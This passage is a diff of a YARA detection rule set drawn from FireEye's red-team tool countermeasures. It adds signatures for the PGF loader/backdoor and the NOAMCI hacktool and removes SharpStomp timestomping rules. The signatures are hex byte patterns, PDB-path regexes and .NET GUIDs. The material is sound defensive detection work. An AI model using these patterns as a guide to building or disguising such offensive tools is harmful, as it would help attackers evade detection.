?? 00 00 00 00 E9 ?? ?? ?? ?? C7 04 24 62 40 41 6A A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 04 C7 44 24 ?? 6E 40 41 6A 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC 08 89 45 ?? 89 E8 89 45 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC 08 C7 45 ?? 00 00 00 00 8B 55 ?? 8B 85 ?? ?? ?? ?? 39 C2 0F 83 ?? ?? ?? ?? 8B 45 ?? 8B 00 3D FF 0F 00 00 0F 86 ?? ?? ?? ?? 8B 45 ?? 8B 00 39 45 ?? 73 ?? 8B 45 ?? 8B 00 8B 55 ?? 81 C2 00 10 00 00 39 D0 73 ?? C7 45 ?? 01 00 00 00 83 7D ?? 00 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 00 39 45 ?? 0F 83 ?? ?? ?? ?? 8B 45 ?? 8B 00 8B 4D ?? 8B 55 ?? 01 CA 39 D0 0F 83 ?? ?? ?? ?? B9 00 00 00 00 B8 1C 00 00 00 83 E0 FC 89 C2 B8 00 00 00 00 89 8C 05 ?? ?? ?? ?? 83 C0 04 39 D0 72 ?? 8B 45 ?? 8B 00 C7 44 24 ?? 1C 00 00 00 8D 95 ?? ?? ?? ?? 89 54 24 ?? 89 04 24 A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 0C 8B 85 ?? ?? ?? ?? 83 E0 20 85 C0 74 ?? 8B 45 ?? 8B 00 C7 44 24 ?? 30 14 3C 6A 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 00 00 00 00 EB ?? 90 EB ?? 90 83 45 ?? 04 E9 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 8B 40 ?? 89 C2 8B 45 ?? 01 D0 89 45 ?? 8B 45 ?? 8B 50 ?? 8B 45 ?? 01 D0 89 45 ?? C7 44 24 ?? 30 14 3C 6A 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 01 00 00 00 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 01 EB ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 83 E8 01 85 C0 74 ?? 83 E8 01 0F 0B 89 95 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? FF FF FF FF E8 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? FF FF FF FF E8 ?? ?? ?? ?? 90 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 65 ?? 5B 5E 5F 5D C3 }
+		$cond6 = { 55 89 E5 57 56 53 81 EC FC 06 00 00 C7 85 ?? ?? ?? ?? F0 EF D5 63 C7 85 ?? ?? ?? ?? CC FF D5 63 8D 85 ?? ?? ?? ?? 89 28 BA 28 1B D4 63 89 50 ?? 89 60 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? FF FF FF FF FF D0 C7 44 24 ?? 04 01 00 00 8D 95 ?? ?? ?? ?? 89 54 24 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC 0C 85 C0 0F 94 C0 84 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 55 ?? 89 54 24 ?? 8D 95 ?? ?? ?? ?? 89 14 24 C7 85 ?? ?? ?? ?? 01 00 00 00 89 C1 E8 ?? ?? ?? ?? 83 EC 08 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 89 44 24 ?? C7 04 24 08 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? 83 7D ?? 00 75 ?? C7 85 ?? ?? ?? ?? 00 00 00 00 E9 ?? ?? ?? ?? C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 28 04 00 00 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? 83 7D ?? 00 74 ?? 8D 85 ?? ?? ?? ?? C7 44 24 ?? 00 00 00 00 8D 95 ?? ?? ?? ?? 83 C2 20 89 14 24 89 C1 E8 ?? ?? ?? ?? 83 EC 08 83 F8 FF 0F 95 C0 84 C0 74 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? EB ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 04 83 7D ?? 00 74 ?? 83 7D ?? 00 75 ?? C7 85 ?? ?? ?? ?? 00 00 00 00 E9 ?? ?? ?? ?? C7 04 24 7E 40 D9 63 A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 04 C7 44 24 ?? 8A 40 D9 63 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC 08 89 45 ?? 89 E8 89 45 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC 08 C7 45 ?? 00 00 00 00 8B 55 ?? 8B 85 ?? ?? ?? ?? 39 C2 0F 83 ?? ?? ?? ?? 8B 45 ?? 8B 00 3D FF 0F 00 00 0F 86 ?? ?? ?? ?? 8B 45 ?? 8B 00 39 45 ?? 73 ?? 8B 45 ?? 8B 00 8B 55 ?? 81 C2 00 10 00 00 39 D0 73 ?? C7 45 ?? 01 00 00 00 83 7D ?? 00 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 00 39 45 ?? 0F 83 ?? ?? ?? ?? 8B 45 ?? 8B 00 8B 4D ?? 8B 55 ?? 01 CA 39 D0 0F 83 ?? ?? ?? ?? B9 00 00 00 00 B8 1C 00 00 00 83 E0 FC 89 C2 B8 00 00 00 00 89 8C 05 ?? ?? ?? ?? 83 C0 04 39 D0 72 ?? 8B 45 ?? 8B 00 C7 44 24 ?? 1C 00 00 00 8D 95 ?? ?? ?? ?? 89 54 24 ?? 89 04 24 A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 0C 8B 85 ?? ?? ?? ?? 83 E0 20 85 C0 74 ?? 8B 45 ?? 8B 00 C7 44 24 ?? 30 14 D4 63 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 00 00 00 00 EB ?? 90 EB ?? 90 83 45 ?? 04 E9 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 8B 40 ?? 89 C2 8B 45 ?? 01 D0 89 45 ?? 8B 45 ?? 8B 50 ?? 8B 45 ?? 01 D0 89 45 ?? C7 44 24 ?? 30 14 D4 63 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 01 00 00 00 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 01 EB ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 83 E8 01 85 C0 74 ?? 83 E8 01 0F 0B 89 95 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? FF FF FF FF E8 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? FF FF FF FF E8 ?? ?? ?? ?? 90 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 65 ?? 5B 5E 5F 5D C3 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and any of them
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPSTOMP_2 : FILE
+rule FIREEYE_RT_APT_Loader_MSIL_PGF_1 : FILE
+{
+	meta:
+		description = "base.cs"
+		author = "FireEye"
+		id = "39d9821f-86e8-528a-a0a9-287dbe325484"
+		date = "2020-11-24"
+		date = "2020-11-24"
+		modified = "2020-12-09"
+		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_MSIL_PGF_1.yar#L4-L17"
+		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
+		hash = "a495c6d11ff3f525915345fb762f8047"
+		logic_hash = "4174ed53336f3951d26282dc81b99b2044ac6350d4b4c0074194a9b4acecefee"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		rev = 1
+
+	strings:
+		$sb1 = { 72 [4] 6F [2] 00 0A 26 [0-16] 0? 6F [2] 00 0A [1-3] 0? 28 [2] 00 0A [0-1] 0? 72 [4-5] 0? 28 [2] 00 0A [0-1] 0? 6F [2] 00 0A 13 ?? 1? 13 ?? 38 [8-16] 91 [3-6] 8E 6? 5D 91 61 D2 9C 11 ?? 1? 58 13 [3-5] 8E 6? 3F }
+
+	condition:
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+}
+rule FIREEYE_RT_APT_Loader_Win32_PGF_2 : FILE
+{
+	meta:
+		description = "base dlls: /lib/payload/techniques/dllmain/"
+		author = "FireEye"
+		id = "e11a626b-ce91-5f6c-a514-9a8a02a29cbd"
+		date = "2020-11-25"
+		date = "2020-11-25"
+		modified = "2020-12-09"
+		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win32_PGF_2.yar#L4-L19"
+		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
+		hash = "04eb45f8546e052fe348fda2425b058c"
+		logic_hash = "d69f3f31c4964fe933295563e08bdbb36abadd6611541b9ffa55b6829ced1d21"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		rev = 1
+
+	strings:
+		$sb1 = { 6A ?? FF 15 [4-16] 8A ?? 04 [0-16] 8B ?? 1C [0-64] 0F 10 ?? 66 0F EF C8 0F 11 [0-32] 30 [2] 8D [2] 4? 83 [2] 7? }
+		$sb2 = { 8B ?? 08 [0-16] 6A 40 68 00 30 00 00 5? 6A 00 [0-32] FF 15 [4-32] 5? [0-16] E8 [4-64] C1 ?? 04 [0-32] 8A [2] 3? [2] 4? 3? ?? 24 ?? 7? }
+		$sb3 = { 8B ?? 3C [0-16] 03 [1-64] 0F B? ?? 14 [0-32] 83 ?? 18 [0-32] 66 3? ?? 06 [4-32] 68 [4] 5? FF 15 [4-16] 85 C0 [2-32] 83 ?? 28 0F B? ?? 06 }
+
+	condition:
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and all of them
+}
+rule FIREEYE_RT_APT_Loader_Win64_PGF_4 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "d1a3477d-55c6-5c33-bd65-5b1e0d65f24b"
-		date = "2020-12-02"
-		date = "2020-12-02"
+		id = "4c93ba76-d3a5-568d-88b8-79a6ebc2edbb"
+		date = "2020-11-26"
+		date = "2020-11-26"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPSTOMP/production/yara/APT_HackTool_MSIL_SHARPSTOMP_2.yar#L4-L22"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win64_PGF_4.yar#L4-L17"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "83ed748cd94576700268d35666bf3e01"
-		logic_hash = "4ed1553f12c607792d7d4e7026ecb36231cd417a06eba8b2925c2c643436b5fe"
+		hash = "3bb34ebd93b8ab5799f4843e8cc829fa"
+		logic_hash = "fcc92674e58ec6418d7c709e3f3bc2e1ec859fe0cb444412964a978fb69f5234"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 3
+		rev = 1
 
 	strings:
-		$f0 = "mscoree.dll" fullword nocase
-		$s0 = { 06 72 [4] 6F [4] 2C ?? 06 72 [4] 6F [4] 2D ?? 72 [4] 28 [4] 28 [4] 2A }
-		$s1 = { 02 28 [4] 0A 02 28 [4] 0B 02 28 [4] 0C 72 [4] 28 [4] 72 }
-		$s2 = { 28 [4] 02 28 [4] 0D 12 ?? 03 6C 28 [4] 28 [4] 02 28 [4] 0D 12 ?? 03 6C 28 [4] 28 [4] 02 28 [4] 0D 12 ?? 03 6C 28 [4] 28 [4] 72 }
-		$s3 = "SetCreationTime" fullword
-		$s4 = "GetLastAccessTime" fullword
-		$s5 = "SetLastAccessTime" fullword
+		$sb1 = { 41 B9 04 00 00 00 41 B8 00 10 00 00 BA [4] B9 00 00 00 00 [0-32] FF [1-24] 7? [1-150] 8B 45 [0-32] 44 0F B? ?? 8B [2-16] B? CD CC CC CC [0-16] C1 ?? 04 [0-16] C1 ?? 02 [0-16] C1 ?? 02 [0-16] 48 8? 05 [4-32] 31 [1-4] 88 }
+		$sb2 = { C? 45 ?? 48 [0-32] B8 [0-64] FF [0-32] E0 [0-32] 41 B8 40 00 00 00 BA 0C 00 00 00 48 8B [2] 48 8B [2-32] FF [1-16] 48 89 10 8B 55 ?? 89 ?? 08 48 8B [2] 48 8D ?? 02 48 8B 45 18 48 89 02 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
 }
-rule FIREEYE_RT_Hacktool_MSIL_Sharpstomp_1 : FILE
+rule FIREEYE_RT_APT_Loader_Win64_PGF_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the SharpStomp project."
+		description = "base dlls: /lib/payload/techniques/unmanaged_exports/"
 		author = "FireEye"
-		id = "e113c221-fabe-5af4-b763-463c4f86288d"
-		date = "2020-12-08"
+		id = "1f2280c0-0fdd-5930-947a-931274bccd6f"
+		date = "2020-11-25"
+		date = "2020-11-25"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPSTOMP/production/yara/HackTool_MSIL_SharpStomp_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win64_PGF_1.yar#L4-L19"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "83ed748cd94576700268d35666bf3e01"
-		logic_hash = "fd0a3d046734d48be74d9a74f27570468550d21911c54ca82c81a1d64e9fdd17"
+		hash = "2b686a8b83f8e1d8b455976ae70dab6e"
+		logic_hash = "2e84d614c34b0b7f93fa70fa3312f22e3ff23f2abd33b2e19c00dd6cba7dcfdc"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		rev = 1
+
+	strings:
+		$sb1 = { B9 14 00 00 00 FF 15 [4-32] 0F B6 ?? 04 [0-32] F3 A4 [0-64] 0F B6 [2-3] 0F B6 [2-3] 33 [0-32] 88 [1-9] EB }
+		$sb2 = { 41 B8 00 30 00 00 [0-32] FF 15 [8-64] 83 ?? 01 [4-80] 0F B6 [1-64] 33 [1-32] 88 [1-64] FF ( D? | 5? ) }
+		$sb3 = { 48 89 4C 24 08 [4-64] 48 63 48 3C [0-32] 48 03 C1 [0-64] 0F B7 48 14 [0-64] 48 8D 44 08 18 [8-64] 0F B7 40 06 [2-32] 48 6B C0 28 }
+
+	condition:
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
+}
+rule FIREEYE_RT_APT_Loader_Win32_PGF_1 : FILE
+{
+	meta:
+		description = "base dlls: /lib/payload/techniques/unmanaged_exports/"
+		author = "FireEye"
+		id = "1af4f2ce-c540-5836-a749-43a0b08609b1"
+		date = "2020-11-25"
+		date = "2020-11-25"
+		modified = "2020-12-09"
+		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win32_PGF_1.yar#L4-L19"
+		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
+		hash = "383161e4deaf7eb2ebeda2c5e9c3204c"
+		logic_hash = "d3fb0bd7b678b19ee2e0e846f4e13e4ce7e2629ecda123f34ef52f2af42d2a8e"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		rev = 1
+
+	strings:
+		$sb1 = { 6A ?? FF 15 [4-32] 8A ?? 04 [0-32] 8B ?? 89 ?? 8B [2] 89 [2] 8B [2] 89 ?? 08 8B [2] 89 [2] 8B [2] 89 [2-64] 8B [5] 83 ?? 01 89 [5] 83 [5-32] 0F B6 [1-2] 0F B6 [1-2] 33 [1-16] 88 ?? EB }
+		$sb2 = { 6A 40 [0-32] 68 00 30 00 00 [0-32] 6A 00 [0-16] FF 15 [4-32] 89 45 [4-64] E8 [4-32] 83 ?? 01 [4-80] 0F B6 [1-64] 33 [1-32] 88 [2-64] FF ( D? | 55 ) }
+		$sb3 = { 8B ?? 08 03 ?? 3C [2-32] 0F B? ?? 14 [0-32] 8D [2] 18 [2-64] 0F B? ?? 06 [3-64] 6B ?? 28 }
+
+	condition:
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and all of them
+}
+rule FIREEYE_RT_APT_Loader_Win32_PGF_4 : FILE
+{
+	meta:
+		description = "No description has been set in the source file - FireEye-RT"
+		author = "FireEye"
+		id = "d46d9ae9-cb7d-5a25-9ee2-766097c14af6"
+		date = "2020-11-26"
+		date = "2020-11-26"
+		modified = "2020-12-09"
+		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win32_PGF_4.yar#L4-L17"
+		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
+		hash = "4414953fa397a41156f6fa4f9462d207"
+		logic_hash = "4256bfd3713f330d76cad9d1ddbba91e588dbca2e2b6842e9482525805ddc1e8"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		rev = 1
+
+	strings:
+		$sb1 = { C7 44 24 0C 04 00 00 00 C7 44 24 08 00 10 00 00 [4-32] C7 04 24 00 00 00 00 [0-32] FF [1-16] 89 45 ?? 83 7D ?? 00 [2-150] 0F B? ?? 8B [2] B? CD CC CC CC 89 ?? F7 ?? C1 ?? 04 89 ?? C1 ?? 02 [0-32] 0F B? [5-32] 3? [1-16] 88 }
+		$sb2 = { C? 45 ?? B8 [0-4] C? 45 ?? 00 [0-64] FF [0-32] E0 [0-32] C7 44 24 08 40 00 00 00 [0-32] C7 44 24 04 07 00 00 00 [0-32] FF [1-64] 89 ?? 0F B? [2-3] 89 ?? 04 0F B? [2] 88 ?? 06 8B ?? 08 8D ?? 01 8B 45 0C }
+
+	condition:
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and all of them
+}
+rule FIREEYE_RT_APT_Loader_Win_PGF_1 : FILE
+{
+	meta:
+		description = "PDB string used in some PGF DLL samples"
+		author = "FireEye"
+		id = "14e2102c-3572-5314-999c-ff3f6c94de03"
+		date = "2020-12-08"
+		modified = "2024-03-04"
+		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win_PGF_1.yar#L4-L17"
+		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
+		hash = "013c7708f1343d684e3571453261b586"
+		logic_hash = "9dede268d33a38e980026917bd01bc47a72bfe60ba4a999c91eb727a2f377462"
 		score = 75
 		quality = 73
 		tags = "FILE"
+		rev = 6
+
+	strings:
+		$pdb1 = /RSDS[\x00-\xFF]{20}c:\\source\\dllconfig-master\\dllsource[\x00-\xFF]{0,500}\.pdb\x00/ nocase
+		$pdb2 = /RSDS[\x00-\xFF]{20}C:\\Users\\Developer\\Source[\x00-\xFF]{0,500}\\Release\\DllSource\.pdb\x00/ nocase
+		$pdb3 = /RSDS[\x00-\xFF]{20}q:\\objchk_win7_amd64\\amd64\\init\.pdb\x00/ nocase
+
+	condition:
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and filesize < 15MB and any of them
+}
+rule FIREEYE_RT_APT_Loader_Win_PGF_2 : FILE
+{
+	meta:
+		description = "PE rich header matches PGF backdoor"
+		author = "FireEye"
+		id = "595c9e2a-3d9d-5366-9449-de1bcf333f78"
+		date = "2020-12-08"
+		modified = "2020-12-09"
+		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win_PGF_2.yar#L4-L21"
+		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
+		hash = "226b1ac427eb5a4dc2a00cc72c163214"
+		logic_hash = "b8c024c6b4c3ce9915700b62da8a1f12440215b46f3a56078707f5257e575811"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		md5_2 = "2398ed2d5b830d226af26dedaf30f64a"
+		md5_3 = "24a7c99da9eef1c58f09cf09b9744d7b"
+		md5_4 = "aeb0e1d0e71ce2a08db9b1e5fb98e0aa"
 		rev = 4
 
 	strings:
-		$typelibguid1 = "41f35e79-2034-496a-8c82-86443164ada2" ascii nocase wide
+		$rich1 = { A8 B7 17 3A EC D6 79 69 EC D6 79 69 EC D6 79 69 2F D9 24 69 E8 D6 79 69 E5 AE EC 69 EA D6 79 69 EC D6 78 69 A8 D6 79 69 E5 AE EA 69 EF D6 79 69 E5 AE FA 69 D0 D6 79 69 E5 AE EB 69 ED D6 79 69 E5 AE FD 69 E2 D6 79 69 CB 10 07 69 ED D6 79 69 E5 AE E8 69 ED D6 79 69 }
+		$rich2 = { C1 CF 75 A4 85 AE 1B F7 85 AE 1B F7 85 AE 1B F7 8C D6 88 F7 83 AE 1B F7 0D C9 1A F6 87 AE 1B F7 0D C9 1E F6 8F AE 1B F7 0D C9 1F F6 8F AE 1B F7 0D C9 18 F6 84 AE 1B F7 DE C6 1A F6 86 AE 1B F7 85 AE 1A F7 BF AE 1B F7 84 C3 12 F6 81 AE 1B F7 84 C3 E4 F7 84 AE 1B F7 84 C3 19 F6 84 AE 1B F7 }
+		$rich3 = { D6 60 82 B8 92 01 EC EB 92 01 EC EB 92 01 EC EB 9B 79 7F EB 94 01 EC EB 1A 66 ED EA 90 01 EC EB 1A 66 E9 EA 98 01 EC EB 1A 66 E8 EA 9A 01 EC EB 1A 66 EF EA 90 01 EC EB C9 69 ED EA 91 01 EC EB 92 01 ED EB AF 01 EC EB 93 6C E5 EA 96 01 EC EB 93 6C 13 EB 93 01 EC EB 93 6C EE EA 93 01 EC EB }
+		$rich4 = { 41 36 64 33 05 57 0A 60 05 57 0A 60 05 57 0A 60 73 CA 71 60 01 57 0A 60 0C 2F 9F 60 04 57 0A 60 0C 2F 89 60 3D 57 0A 60 0C 2F 8E 60 0A 57 0A 60 05 57 0B 60 4A 57 0A 60 0C 2F 99 60 06 57 0A 60 73 CA 67 60 04 57 0A 60 0C 2F 98 60 04 57 0A 60 0C 2F 80 60 04 57 0A 60 22 91 74 60 04 57 0A 60 0C 2F 9B 60 04 57 0A 60 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $typelibguid1
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and filesize < 15MB and ( ( $rich1 at 128 ) or ( $rich2 at 128 ) or ( $rich3 at 128 ) or ( $rich4 at 128 ) )
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPSTOMP_1 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_NOAMCI_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'noamci' project."
 		author = "FireEye"
-		id = "4b4a54c8-9717-5fbb-8130-a49162bc6b07"
-		date = "2020-12-02"
-		date = "2020-12-02"
+		id = "48066258-528f-5a70-81e1-15d6dfd9ff4f"
+		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPSTOMP/production/yara/APT_HackTool_MSIL_SHARPSTOMP_1.yar#L4-L24"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/NOAMCI/production/yara/APT_HackTool_MSIL_NOAMCI_1.yar#L4-L16"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "83ed748cd94576700268d35666bf3e01"
-		logic_hash = "af8aa0e87d8b6623a908fde5014f3849cd0ca20d5926c798be82ce4eab2668bb"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "6278cfb4e9af20bbe943f4b99227c7fba276315a9f0059575b3ed4ef96a848c4"
 		score = 75
 		quality = 71
 		tags = "FILE"
-		rev = 3
+		rev = 4
 
 	strings:
-		$s0 = "mscoree.dll" fullword nocase
-		$s1 = "timestompfile" fullword nocase
-		$s2 = "sharpstomp" fullword nocase
-		$s3 = "GetLastWriteTime" fullword
-		$s4 = "SetLastWriteTime" fullword
-		$s5 = "GetCreationTime" fullword
-		$s6 = "SetCreationTime" fullword
-		$s7 = "GetLastAccessTime" fullword
-		$s8 = "SetLastAccessTime" fullword
+		$typelibguid0 = "7bcccf21-7ecd-4fd4-8f77-06d461fd4d51" ascii nocase wide
+		$typelibguid1 = "ef86214e-54de-41c3-b27f-efc61d0accc3" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
 /*
  * YARA Rule Set
  * Repository Name: GCTI
